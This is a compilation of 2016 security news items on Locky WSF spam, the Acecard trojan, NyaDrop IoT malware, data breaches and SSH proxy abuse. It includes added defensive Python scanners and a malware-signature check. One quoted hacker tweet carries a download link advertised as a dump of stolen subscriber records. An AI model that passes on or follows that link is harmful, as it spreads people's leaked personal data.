Ushakov declared that the Kremlin will consider any attack from cyberspace as a "borderline insolence."
Why are Russian hackers interfering with the 2016 political elections?
According to some experts, the Kremlin aims to favor Donald Trump, who has praised Vladimir Putin. The crisis between Russia and the US was exacerbated by the invasion of Crimea and Russian support for the Syrian government.
Symantec observed a surge of spam emails using malicious WSF files
16.10.2016 securityaffairs Spam
Symantec observed a significant increase in the number of email-based attacks using malicious Windows Script File (WSF) attachments.
Experts from Symantec are observing a significant increase in the number of email-based attacks leveraging malicious Windows Script File (WSF) attachments. Over the past three months, threat actors in the wild, mostly criminal organizations behind ransomware campaigns, have adopted the tactic.
“In the past two weeks, Symantec has blocked a number of major campaigns distributing Locky (Ransom.Locky) which involved malicious WSF files.” reads a blog post from Symantec.
A Windows Script File (WSF) is a file type that allows mixing scripting languages, such as Python, JScript and VBScript, within a single file.
WSF files are opened and executed by the Windows Script Host (WSH); they can be launched like a common executable file.
Symantec highlighted that .wsf files are not automatically blocked by some email clients. Threat actors have used malicious Windows Script Files in a number of recent major spam campaigns spreading ransomware like Locky.
Symantec blocked more than 1.3 million emails bearing the subject line "Travel Itinerary" between October 3 and 4. In this campaign, hackers leveraged malicious emails purporting to come from a major airline that carried a Windows Script File within a .zip archive.
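The check a mail gateway could apply to the .zip-wrapped WSF pattern Symantec describes, added here as an example that is not part of Symantec's post or any Symantec tooling; the sample WSF and the archive wrapping it are constructed and contain only inert script stubs:

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# File extensions the Windows Script Host executes directly on double-click.
WSH_EXTENSIONS = (".wsf", ".js", ".jse", ".vbs", ".vbe", ".wsh")

# Constructed sample: a harmless WSF mixing two script languages in one <job>,
# the layout the article describes. No real campaign file is reproduced here.
SAMPLE_WSF = b"""<?xml version="1.0"?>
<job id="sample">
  <script language="JScript">var unused = 1;</script>
  <script language="VBScript">Dim unused: unused = 2</script>
</job>
"""


def wsf_script_languages(wsf_bytes):
    """Return the languages declared in a WSF's <script> elements.

    WSH is lenient with malformed XML, so fall back to a regex when the
    strict XML parser rejects the file rather than treating it as clean.
    """
    try:
        root = ET.fromstring(wsf_bytes)
        return [elem.get("language", "?") for elem in root.iter("script")]
    except ET.ParseError:
        text = wsf_bytes.decode("utf-8", errors="ignore")
        return re.findall(r'<script[^>]*language\s*=\s*"([^"]+)"', text, re.IGNORECASE)


def _is_wsh_name(name):
    # Case-insensitive and tolerant of double extensions such as "report.pdf.wsf".
    return name.lower().endswith(WSH_EXTENSIONS)


def inspect_attachment(filename, data):
    """Classify one mail attachment.

    Returns {"verdict": "block" | "allow", "findings": [(name, languages), ...]}.
    A bare script file is flagged directly; a .zip is opened in memory and
    every member is examined, which is the Locky delivery pattern in the article.
    """
    findings = []
    if _is_wsh_name(filename):
        langs = wsf_script_languages(data) if filename.lower().endswith(".wsf") else []
        findings.append((filename, langs))
    elif filename.lower().endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for member in archive.infolist():
                    if _is_wsh_name(member.filename):
                        body = archive.read(member)
                        langs = wsf_script_languages(body) if member.filename.lower().endswith(".wsf") else []
                        findings.append((member.filename, langs))
        except zipfile.BadZipFile:
            # An unreadable archive cannot be vouched for; record it as a finding.
            findings.append((filename, ["unreadable-zip"]))
    return {"verdict": "block" if findings else "allow", "findings": findings}


def build_sample_zip(member_name="Travel Itinerary.wsf"):
    """Constructed .zip carrying SAMPLE_WSF, mimicking the airline-themed lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(member_name, SAMPLE_WSF)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_attachment("Travel Itinerary.zip", build_sample_zip()))
    print(inspect_attachment("itinerary.pdf", b"%PDF-1.4 constructed stub"))
```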
Symantec added that on October 5, the same threat actor launched a new massive spam campaign with the subject line “complaint letter.”
“Symantec blocked more than 918,000 of these emails. The email purported to come from someone representing a client who was making a complaint “regarding the data file you provided.” Once again, the emails came with an attachment that consisted of a WSF file within a .zip archive. If the WSF file was allowed to run, Locky was installed on the victim’s computer.” added Symantec.
Experts from Symantec believe that the use of .WSF files is part of a broader trend; the number of blocked emails containing this kind of malicious attachment has increased in recent months, as reported in the following graph.
“From just over 22,000 in June, the figure shot up to more than 2 million in July. September was a record month, with more than 2.2 million emails blocked.” reads the post from Symantec.
Threat actors in the wild often adopt new tactics, frequently changing the format of the malicious attachments in their campaigns to avoid detection.
Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers
The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, GCHQ Director Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe took part in the challenge; only 30,000 made it to the final stage, but three people came very close and were considered winners by GCHQ.
However, the solution to the Christmas puzzle, including explanations from the puzzle-setters, was publicly made available early this year for anyone to have a look.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."
FBI is Investigating Theft of $1.3 Million in Bitcoin from a Massachusetts Man
16.10.2016 thehackernews Crime
Over two months ago, the world's third largest Bitcoin Exchange Bitfinex lost around $72 Million worth of Bitcoins in a major hack.
Shortly after the company suffered the $72,000,000 Bitcoin theft, an unnamed Bitfinex user from Cambridge, Massachusetts, filed a police report in September, alleging that $1.3 Million of funds were stolen from his account.
Since then the Cambridge police have handed the case over to the FBI, which is working with the Bitcoin exchange as well as European authorities to recover funds stolen from the Bitfinex user, Coindesk reports.
The individual claimed that he held $3.4 Million in Bitcoin in his personal wallet hosted by the Bitfinex Bitcoin exchange. But following August's Bitfinex breach, he was left with $2.1 Million in his account.
Bitfinex then notified the individual of his initial loss of approximately $1.3 Million in Bitcoin, but after the company issued IOU tokens as an emergency measure to keep the exchange operating, the loss incurred was reduced to just $720,000.
The IOUs or BFX tokens are a form of compensation provided to the victims to reduce their losses by a significant factor.
Although specific details remain unclear, the Bitfinex user confirmed a loss of funds beyond the Bitfinex IOU tokens issued to all the victims of the breach.
The usability of the tokens is still unclear: the explanation of the tokens provided by Bitfinex is not very clear, and the legal status of the tokens is unknown.
"The BFX tokens will remain outstanding until repaid in full by Bitfinex or exchanged for shares of iFinex Inc," explains the company. "The specific conditions associated with the exchange of these tokens will be explained in a later announcement."
For the incident report filed by the Bitfinex user, you can head on to this link. No further details about the case are available at this moment.
Shortly after the breach of around $72 Million worth of its customers' Bitcoins, the Hong Kong-based Bitcoin exchange announced a reward of $3.5 Million to anyone who can provide information that leads to the recovery of the stolen Bitcoins.
The incident was so big that the price of Bitcoin dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day of the announcement.
58M records dumped from an unsecured DB of the Modern Business Systems
16.10.2016 securityaffairs Crime
Hackers have leaked online over 58 million customer records from data storage firm Modern Business Systems, but the situation could be more severe.
58 million customer records have been leaked online by hackers; the huge trove of data seems to come from a data storage firm.
The records include personal information such as names, dates of birth, email and postal addresses, job titles, phone numbers, vehicle data, and IP addresses.
The archive appears to have been exfiltrated from an unsecured database of Modern Business Systems (MBS), a company that provides data storage and database hosting services.
I received a portion of the archive a few days ago from the hacker who uses the Twitter account @0x2Taylor. When the hacker sent me the archive, neither of us had any idea about its source.
The hacker released at least 58 million records stolen from Modern Business Systems’s systems.
On 8 October 2016, @0x2Taylor tweeted: "Database Loaded : 52 Million Subscriber DB https://mega.nz/#!t9EyUapD!uOfzzH-SJOlYycdYTq8AKzdcBoR8R02kXvZ3naaL3Xs … Email,DOB,Name,Address,IP,Phone Number. #0x2Gang #DataDump"
Experts who analyzed the archive determined that it belongs to MBS which was exposing an unsecured MongoDB database on the Internet.
“While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information. Through additional investigation and subsequent exchanges with 0x2Taylor, researchers were able to obtain the IP address of the database.” reads a blog post published by Risk Based Security. “With that information, researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS or Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.”
The database includes data from companies that are customers of MBS; if you have had a business relationship with it, you can check for the presence of your data through the breach notification service "Have I Been Pwned?".
Unfortunately, the situation is probably more severe: taking a close look at the above image, experts speculate that the hacker had access to a database containing over 258 million rows of customer records.
This breach is the latest in a series related to misconfigured MongoDB databases. In the past security experts
In December, the popular expert and Shodan creator John Matherly found over 650 terabytes of MongoDB data exposed on the Internet by vulnerable databases.
Android Acecard banking trojan asks users for selfie with an ID card
16.10.2016 securityaffairs Android
Experts discovered a new variant of the Android Acecard banking trojan that asks victims to take a selfie while they are holding an ID card.
The inventiveness of criminals is boundless. Recently, a number of organizations announced a new authentication method based on selfies. For example, HSBC customers can open new bank accounts using a selfie, as can customers of the Bank of Scotland, many other financial organizations, and Mastercard.
Crooks have already started taking advantage of this new method of biometric authentication: experts at McAfee discovered a new variant of the Android banking Trojan dubbed Acecard that pretends to be an adult video app or a codec/plug-in necessary to see a specific video.
“Recently the McAfee Labs Mobile Research Team found a new variant of the well-known Android banking Trojan Acecard (aka Torec, due to the use of Tor to communicate with the control server) that goes far beyond just asking for financial information.” reads a blog post published by McAfee. “In addition to requesting credit card information and second-factor authentication, the malicious application asks for a selfie with your identity document—very useful for a cybercriminal to confirm a victim’s identity and access not only to banking accounts, but probably also even social networks.”
The fake video plugin appears as an Adobe Flash Player, a pornographic app, or a video codec.
While running in the background, the Acecard banking Trojan monitors the opening of specific apps usually associated with payment transactions. When the victim opens one of these apps, the malware presents a phishing overlay, pretending to be Google Play, that requests the card details and more personal and financial data (i.e. cardholder name, date of birth, phone number, credit card expiration date, and CCV).
After collecting credit card and personal information from the victim, the Acecard banking Trojan asks victims to complete a fake "identity confirmation" composed of three steps. In the first two steps the app requests the victim to upload a clean and readable photo of the front and back of his identity document (national ID, passport, driver's license):
In the final step, the malicious app asks victims to take a selfie while holding their ID card.
“After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license).” continues the post. “The final step asks for a selfie with the identity document.”
The information collected by the Acecard banking Trojan allows attackers to perform several illegal activities that would result in the victim’s identity theft.
According to the experts, this variant of the Acecard banking Trojan has impacted users in Singapore and Hong Kong.
As usual, let me suggest avoiding downloads from untrusted app stores and carefully reviewing the permissions apps ask for ... and of course don't take selfies while holding your ID card.
Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card
15.10.2016 thehackernews Android
Advanced Android Banking Trojan Tricks Victims to Submit a Selfie Holding Their ID Card
While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification method.
Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, a pornographic app, or a video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.
The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerous Android banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.
Once successfully installed, the trojan asks users for a number of device permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.
Acecard Steals your Payment Card and Real ID details
The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.
"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."
Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for "verification purposes," and even requests a photo of the front and back sides of their ID card.
After this, the Trojan also prompts users to hold their ID card in their hand, underneath their face, and take a selfie.
Hackers can make illegal Transfers and Take Over your Online Accounts
All these pieces of information are more than enough for an attacker to confirm illegal banking transactions and take over victims' social media accounts by confirming the stolen identities.
So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.
This social engineering trick is obviously not new, and any tech-savvy user would quickly spot this malicious behavior, as there is no reason for Google to ask for your ID card. But the trick still works with non-technical and less technical users.
Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.
Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.
Exclusive – ELF Linux/NyaDrop, a new IoT threat in the wild
15.10.2016 securityaffairs Virus
Exclusive: an interview by @unixfreaxjp of MalwareMustDie for Security Affairs about Linux/NyaDrop, with the latest details about this new dangerous IoT malware.
After the Krebs DDoS attacks, the enrollment of new IoT botnets is set to grow, and new large "zombie armies" made of web IP cameras, DVRs/NVRs, and routers/modems are invading cyberspace.
The evidence of this comes from the discovery of a new undetected malware codenamed NyaDrop by the same security researcher who discovered and reverse engineered the now famous Mirai: MalwareMustDie!
As MalwareMustDie reports in the research published yesterday on his blog, the new undetected malware NyaDrop, like most IoT malware emerging today, relies on an infection method that starts with a brute-force attack in which it tries to exploit the default credentials of the device. We have to remember that web IP cameras, DVRs/NVRs, and routers/modems are often deployed without changing the default credentials.
Once NyaDrop succeeds in connecting to the IoT device over the Telnet protocol, it infects the system by dropping (downloading) the real NyaDrop binary code onto the guest host; that is why NyaDrop is initially a small executable file.
Figure 1: strings contained in the binary code of NyaDrop
Not many strings can be extracted from the NyaDrop binary except "nyABa", from which the codename "Nya" derives. This string is anyway "a good way to grep for the easy filtration or one of the conditions in filtering this malware version for the mitigation purpose / signature."
But let's take a look at the binary code of the malware.
“If you see the size, we are dealing with a small executable file. It’s a clean libc compiled ELF from coded in C in such form that we see much in shellcodes. Insides are filled with the MIPS opcodes. We dealt before with the similar small ELF malware before in the following posts in here [link] and here [link], I will try to deal with this one too :)”
Figure 2: The NyaDrop ELF
Small size, yes? But it is amazing to see what this small malicious ELF can do.
In the MalwareMustDie analysis, the expert confirms that NyaDrop will then try to connect from the infected device to the C&C host in order to download the Nya trojan, provided the IoT device uses a "MIPS CPU architecture, implying routers and similar networking devices, with 32bit clock."
MIPS-based CPUs are often found within devices such as routers, DVRs, CCTV cameras, and other embedded systems, as we mentioned above.
So we have here a very environment-selective malware, which means that the NyaDrop author did not want to attack every IoT platform; on the contrary, he wanted to avoid infecting "useless" devices, targeting the best devices with the most bandwidth and avoiding "dropping" the precious binary code on incompatible systems where it could not be executed.
The exclusive interview of @unixfreaxjp from MalwareMustDie for Security Affairs about Linux/NyaDrop
But let's get to the interview with MalwareMustDie.
Q: What makes the sighting of NyaDrop so low, even though some may have seen the attacks/efforts to infect?
A: We can summarize those key points:
The actor really checks the target; he aims only at the desirable type of hardware and does not bother to infect an environment that does not match.
He makes sure to delete the "nya" upon an effort to inject a new NyaDrop, so it is also not impossible that after a new "nya" is installed it will delete the NyaDrop too. That way no one knows or has a sample.
Many people ask for more samples; it is very hard to get a real working one without getting cut off in the middle of infection. Lucky that I know many tricks in shells.
Q: Why do you think he is targeting the MIPS architecture in your case? How did the herder make the effort for the infection on that architecture?
A: I am not sure why, but obviously, next to ARM, MIPS devices are plentiful on the internet, especially networking boxes such as gateways, routers, switches, modems etc. He made a hard effort to make the binary as small as possible with a limited buffer size; you can see it in the reversing part I made. The total binary size is 621 bytes, with complete functionality using syscalls (socket, connect, recv, open, write, close). NyaDrop was designed as a backdoor to be a pwn tool for routers.
Q: How effective do you think using Telnet to inject/install NyaDrop on the targeted machine is?
A: Only if you know a Telnet flaw of the device or a hardcoded password would one aim at this sector. In this season, we have about 2 million devices with Telnet running on the internet, so the effectiveness of aiming at this protocol to gain shell privilege is fairly high. The way the coder injects the binary using echo commands is not smart and can raise the risk of breaking some shells handling that data; this is also why the number of successfully injected binaries spotted is low.
Sorry, but I am not going to suggest the best way to do this.
Q: You mentioned it was originated in Russia, why?
A: Seeing the way it is coded and compiled, it is good; it trimmed the ELF to the minimum running state... it is very hard to imagine that the skiddies we know have such knowledge.
I investigated the source IP used more deeply; such a connection would not easily be contracted by westerners.
Q: Do you think it is a new concept to infect IoT using the dropper/injector backdoor like Linux/NyaDrop?
A: For malware in general, the concept is not new; for IoT it is new, since IoT was never targeted as hard as it is now. But I have seen many types of socket connect()/back_connect() ELF droppers on the server side plenty of times; during the Shellshock era we had tons of these, so the concept is not new at all.
In fact, I know exactly what, where, and how to look when this type is starting to hit IoT.
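A triage check built from the traits the analysis and the interview name (a tiny 32-bit MIPS ELF carrying the "nyABa" string), added here as an example and not MalwareMustDie's code; the sample ELF headers are synthetic and not executable, and the 4 KB "tiny" threshold is an assumption:

```python
import struct

ELF_MAGIC = b"\x7fELF"
EM_MIPS = 8              # e_machine value for MIPS in the ELF specification
EM_X86_64 = 62           # used only for the non-matching sample below
ELFCLASS32 = 1
MARKER = b"nyABa"        # the string MalwareMustDie suggests grepping for
SMALL_ELF_BYTES = 4096   # assumption: NyaDrop is 621 bytes, so anything this small counts as "tiny"


def elf_header_info(blob):
    """Parse the first 20 bytes of an ELF header: class, byte order, type, machine.
    Returns None when the blob is not an ELF file."""
    if len(blob) < 20 or blob[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = blob[4], blob[5]      # EI_CLASS and EI_DATA from e_ident
    endian = ">" if ei_data == 2 else "<"
    e_type, e_machine = struct.unpack(endian + "HH", blob[16:20])
    return {"class": ei_class, "big_endian": ei_data == 2,
            "type": e_type, "machine": e_machine}


def triage_nyadrop(blob):
    """Score a file against the NyaDrop traits described in the article.

    verdict: "not-elf", "clean", "review" (tiny MIPS32 ELF, worth a look),
    or "suspect" (the nyABa marker is present).
    """
    header = elf_header_info(blob)
    if header is None:
        return {"verdict": "not-elf", "traits": []}
    traits = []
    if header["machine"] == EM_MIPS and header["class"] == ELFCLASS32:
        traits.append("mips32")
    if len(blob) <= SMALL_ELF_BYTES:
        traits.append("tiny")
    if MARKER in blob:
        traits.append("nyaba-marker")
    if "nyaba-marker" in traits:
        verdict = "suspect"
    elif "mips32" in traits and "tiny" in traits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "traits": traits, "header": header}


def make_fake_elf(machine, ei_class=ELFCLASS32, big_endian=True, payload=b""):
    """Constructed ELF header followed by filler bytes; not a real program."""
    endian = ">" if big_endian else "<"
    e_ident = ELF_MAGIC + bytes([ei_class, 2 if big_endian else 1, 1]) + b"\x00" * 9
    # e_type=ET_EXEC(2), e_machine, e_version=1; the rest of the header is omitted
    return e_ident + struct.pack(endian + "HHI", 2, machine, 1) + payload


def scan_files(paths):
    """Run the triage over files on disk; returns {path: verdict}."""
    results = {}
    for path in paths:
        with open(path, "rb") as fh:
            results[path] = triage_nyadrop(fh.read())["verdict"]
    return results


if __name__ == "__main__":
    sample = make_fake_elf(EM_MIPS, payload=b"\x00" * 580 + MARKER)
    print(triage_nyadrop(sample))
```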
About the Author: Odisseus
Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.
Security experts released an anti-reconnaissance tool dubbed NetCease
15.10.2016 securityaffairs Security
A Microsoft security duo released a new tool dubbed NetCease designed to make it hard for attackers to conduct reconnaissance.
Microsoft experts have released a tool dubbed NetCease, designed to make hackers' reconnaissance activities harder.
The NetCease tool was developed by two researchers of the Microsoft Advanced Threat Analytics (ATA) research team, Itai Grady and Tal Be’ery.
The security experts will present the tool at Black Hat Europe, where they will explore the concept of "offensive cyber defense" methods.
The application is not classified as an official Microsoft tool, but it has been made available on Microsoft’s TechNet Gallery under the default license terms for “Software on Documentation Portals.”
Reconnaissance is a critical phase of an attack: attackers gather information on potential targets, identifying target machines, potential bridge components for lateral movement, and privileged users.
Once the attacker has identified the targets, he can use the NetSessionEnum function to retrieve information about sessions established on domain controllers (DC) or other servers in the network.
A NetSessionEnum call could allow attackers to discover the device name, IP address, the username that established a session, and the duration of each session.
This data is essential for attackers to move laterally within their victim's network.
Any domain user has permission by default to execute the NetSessionEnum method remotely. However, it is possible to harden access to the NetSessionEnum method by manually editing a registry key. NetCease is a PowerShell script that modifies this registry key to restrict who can execute NetSessionEnum.
""Net Cease" tool is a short PowerShell (PS) script which alters Net Session Enumeration (NetSessionEnum) default permissions. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim's network." reads the NetCease description.
“The NetCease script hardens the access to the NetSessionEnum method by removing the execute permission for Authenticated Users group and adding permissions for interactive, service and batch logon sessions,” the experts explained. “This will allow any administrator, system operator and power user to remotely call this method, and any interactive/service/batch logon session to call it locally.”
NetCease is simple to use: administrators have to run the PowerShell script as administrator on the machine they need to harden (i.e. a Domain Controller), then restart it.
33 million records exposed after the Evony data breach
14.10.2016 securityaffairs Crime
The website and the forum of the Evony gaming company were hacked this summer, and as a result 33 million of its gamers had their data compromised.
Data from more than 33 million accounts of the Evony gaming company were stolen as a result of a data breach that occurred in June. Evony is the company that developed the popular game Evony: Age II, which is played by more than 18 million gamers in over 167 countries. Hackers breached the website of the Evony gaming firm, accessing 33,407,472 records of registered user accounts.
Two months later, in August, the website was breached again; this time hackers compromised the Evony forum, exposing data of 938,000 registered accounts.
The data breach notification service LeakedSource obtained a copy of the huge archive and published a detailed analysis of the leaked data.
“Gaming company Evony was hacked for a total of 33,407,472 users from its main game database in June of 2016. Earlier this year in August we discovered their forums were also hacked for 938k users.” states a blog post published by the company.
“Each record contains a username, email address, password, and ip address among other internal data fields. Users can now get notified any time they appear in a breach. If your personal information appears in our copy of this database, or in any other leaked database that we possess, you may remove yourself for free.”
Each record includes a username, email address, password, IP address and other internal data. The passwords were stored as unsalted MD5 and SHA-1 (Secure Hash Algorithm 1) hashes, which means they are quite easy for attackers to crack.
“Passwords were stored using unsalted MD5 hashing which means at this point we have cracked most of them. Surprisingly they also stored the passwords in unsalted SHA1 next to the MD5 which makes no sense but anyway” continues the post.
123456 was the most used password on the gaming site, which shows that users have a low perception of cyber threats and little awareness of a proper online security posture.
A look at the top email domains reveals that @Yahoo.com was one of the most popular, followed by @hotmail.com.
At the time of writing it is not clear whether the Evony company has alerted its registered users.
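To make the storage weakness concrete, here is an added example (mine, not code from LeakedSource or Evony) that hashes a constructed user table the way the leak describes, unsalted MD5 and SHA-1, and contrasts it with a salted, iterated hash; the usernames, passwords and wordlist are made up.

```python
import hashlib
import hmac
import os

# Constructed sample accounts (made up, not from the Evony leak).
SAMPLE_USERS = {"alice": "123456", "bob": "123456", "carol": "123456",
                "dave": "correct horse battery staple"}
# A few very common passwords, standing in for the wordlists that make
# unsalted digests of popular passwords instantly recognisable.
COMMON_PASSWORDS = ["123456", "password", "qwerty"]


def unsalted_md5(password):
    return hashlib.md5(password.encode()).hexdigest()


def store_unsalted(users):
    """Store passwords as the leaked database did: MD5 and SHA-1 digests of
    the bare password, so identical passwords produce identical digests."""
    return {u: (unsalted_md5(p), hashlib.sha1(p.encode()).hexdigest())
            for u, p in users.items()}


def accounts_recognised(unsalted_db, common):
    """Accounts whose MD5 matches a precomputed digest of a common password.
    One table, computed once, answers every account; no per-user work."""
    table = {unsalted_md5(p) for p in common}
    return sum(1 for md5, _ in unsalted_db.values() if md5 in table)


def hash_password(password, salt=None, iterations=100_000):
    """Salted, iterated PBKDF2-HMAC-SHA256, shown for contrast."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def store_salted(users):
    """With a random salt per account, the three '123456' users no longer
    share a digest, so a precomputed table no longer applies."""
    return {u: hash_password(p) for u, p in users.items()}
```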
12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices
14.10.2016 thehackernews Vulnerebility
Are your internet-connected devices spying on you? Perhaps.
We already know that Internet of Things (IoT) devices are so badly insecure that hackers are adding them to their botnets to launch Distributed Denial of Service (DDoS) attacks against target services.
But these connected devices are not limited to conducting DDoS attacks; they have far more potential to harm you.
New research [PDF] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old vulnerability in OpenSSH to secretly gain control of millions of connected devices.
The hackers then turn these devices, which the researchers call the "Internet of Unpatchable Things", into proxies for malicious traffic against internet-based targets and internet-facing services, along with the internal networks that host them.
Unlike recent attacks via Mirai botnet, the new targeted attack, dubbed SSHowDowN Proxy, specifically makes use of IoT devices such as:
Internet-connected Network Attached Storage (NAS) devices.
CCTV, NVR, DVR devices (video surveillance).
Satellite antenna equipment.
Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
Other devices could be susceptible as well.
More importantly, the SSHowDowN Proxy attack exploits a more than decade-old default-configuration flaw (CVE-2004-1653) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw enables TCP forwarding and port bounces when a proxy is in use.
However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 million IoT and networking devices have been compromised by SSHowDowN-type attacks.
Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks "against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning," and to mount attacks against internal networks that host these connected devices.
Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device's data and, in some cases, fully take over the affected machine.
While the flaw itself is not so critical, the company says the continual failure of vendors to secure IoT devices, together with their use of default and hard-coded credentials, has left the door wide open for hackers to exploit them.
"We are entering a very interesting time when it comes to DDoS and other web attacks; 'The Internet of Unpatchable Things' so to speak," said Eric Kobrin, senior director of Akamai's Threat Research team.
"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We've been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."
According to the company, at least 11 of Akamai's customers in industries such as financial services, retail, hospitality, and gaming have been targets of the SSHowDowN Proxy attack.
The company is "currently working with the most prevalent device vendors on a proposed plan of mitigation."
How to Mitigate Such Attacks?
So, if you own a connected coffee machine, thermostat or any other IoT device, you can protect yourself by changing the factory default credentials of the device as soon as you activate it, and by disabling its SSH service if it is not required.
More technical users can establish inbound firewall rules that block SSH access to and from external hosts.
Meanwhile, vendors of internet-connected devices are recommended to:
Avoid shipping such products with undocumented accounts.
Force their customers to change the factory default credentials after device installation.
Restrict TCP forwarding.
Allow users to update the SSH configuration to mitigate such flaws.
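The vendor recommendations above map onto a handful of sshd_config directives. As an added example (mine, not Akamai's or any vendor's code), the following Python audits the effective global settings of a constructed sshd_config, applying sshd's first-value-wins rule, and flags the settings behind the TCP-forwarding and default-credential advice; the two config fragments are hypothetical.

```python
import re

# sshd defaults for the options checked here (per the OpenSSH manual).
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no",
            "permitemptypasswords": "no"}

# Constructed sshd_config fragments (hypothetical, not from any real device).
DEVICE_DEFAULT_CONFIG = """\
PermitEmptyPasswords yes
AllowTcpForwarding yes
GatewayPorts yes
AllowTcpForwarding no   # ignored: sshd keeps the FIRST value it reads
"""
HARDENED_CONFIG = """\
PermitEmptyPasswords no
AllowTcpForwarding no
GatewayPorts no
Match User backup
    AllowTcpForwarding yes   # conditional, applies to that user only
"""


def parse_sshd_config(text):
    """Effective global settings: sshd uses the first value it reads for a
    keyword (later duplicates are ignored), and everything after the first
    Match block is conditional, so it is left out of the global view."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # Keyword and argument are separated by whitespace or a single '='.
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break
        settings.setdefault(key, parts[1] if len(parts) > 1 else "")
    return settings


def audit_forwarding(text):
    """Findings that correspond to the vendor recommendations above."""
    eff = {**DEFAULTS, **parse_sshd_config(text)}
    findings = []
    if eff["allowtcpforwarding"].lower() != "no":
        findings.append("AllowTcpForwarding is not 'no': sshd relays TCP for clients")
    if eff["gatewayports"].lower() != "no":
        findings.append("GatewayPorts is not 'no': forwarded ports are reachable externally")
    if eff["permitemptypasswords"].lower() == "yes":
        findings.append("PermitEmptyPasswords yes: empty-password accounts can log in")
    return findings
```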
Since the number of IoT devices has now reached the tens of billions, it is time to protect these devices before hackers cause a disastrous situation.
Non-profit organizations like MITRE have come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. The organization is also offering up to $50,000 in prize money.
Here’s how Tor Project and Mozilla will make de-anonymizing Tor users harder
14.10.2016 securityaffairs Security
Tor Project and Mozilla are working together to improve the security of Tor users and make it harder for attackers to unmask them.
Intelligence and law enforcement agencies continue to invest in de-anonymizing Tor users. In the past, we received news about several techniques devised by various agencies to track Tor users, from correlation attacks to hacking a user's machine with the NIT script.
